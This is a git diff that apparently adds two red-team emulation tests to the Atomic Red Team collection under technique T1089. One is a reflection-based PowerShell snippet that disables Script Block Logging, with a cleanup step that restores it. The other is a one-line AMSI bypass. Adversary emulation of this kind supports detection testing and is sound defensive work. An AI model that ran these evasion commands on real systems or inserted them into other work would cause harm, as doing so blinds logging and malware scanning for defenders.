diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 745b8a88..5f387adb 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -30,6 +30,10 @@
- [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service)
+- [Atomic Test #14 - Disable PowerShell Script Block Logging](#atomic-test-14---disable-powershell-script-block-logging)
+
+- [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface)
+
@@ -311,4 +315,50 @@ sc.exe config #{service_name} start= auto
net.exe start #{service_name}
```
+
+
+
+## Atomic Test #14 - Disable PowerShell Script Block Logging
+An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+```
+
+
+#### Cleanup Commands:
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+```
+
+
+
+
+## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
+An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
+
diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 4ede9312..86b5e4c7 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -200,4 +200,38 @@ atomic_tests:
sc.exe config #{service_name} start= disabled
cleanup_command: |
sc.exe config #{service_name} start= auto
- net.exe start #{service_name}
\ No newline at end of file
+ net.exe start #{service_name}
+
+- name: Disable PowerShell Script Block Logging
+ description: |
+ An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+ cleanup_command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+
+- name: PowerShell Bypass of AntiMalware Scripting Interface
+ description: |
+ An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index 057a98e3..e102fa0c 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -213,6 +213,8 @@
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+ - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+ - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index b3bc0108..66aeab8e 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6978,9 +6978,36 @@ defense-evasion:
command: |
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
- cleanup_command: |-
+ cleanup_command: |
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
+ - name: Disable PowerShell Script Block Logging
+ description: "An adversary may disable PowerShell Script Block Logging to avoid
+ leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+ cleanup_command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+ - name: PowerShell Bypass of AntiMalware Scripting Interface
+ description: "An adversary may bypass Windows Defender AMSI to execute malicious
+ PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
T1107:
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 978851a6..cf69e36c 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -43,6 +43,8 @@
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+ - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+ - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)